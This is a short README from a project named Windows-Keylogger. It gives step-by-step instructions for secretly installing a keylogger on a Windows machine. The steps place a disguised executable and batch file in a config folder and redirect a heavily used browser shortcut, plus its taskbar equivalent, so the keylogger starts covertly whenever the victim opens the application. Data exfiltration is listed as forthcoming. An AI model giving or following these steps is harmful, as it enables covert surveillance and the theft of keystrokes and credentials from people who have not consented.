adeptio/Windows-Keylogger/README.md

 2).
 Upload crash_backup.exe, Visuals.txt, and launch.bat - create a folder to house these files.
 Ex: C:\Config\Visuals.txt, C:\Config\crash_backup.exe, C:\Config\launch.bat.

 3).
 Find a desktop shortcut that seems to get a lot of use, like a browser.
 Right click the shortcut, then click properties.
 Change the address in the Target field to be that of launch.bat.
 When this shortcut is used, it will also start our keylogger.

+Also do this for the equivalent taskbar/toolbar icon if it exists: right click the icon, then right click the application name in the jump list and click Properties.
+Change the Target field in the same way as above.

 4).
 Exfiltrate the data (coming soon).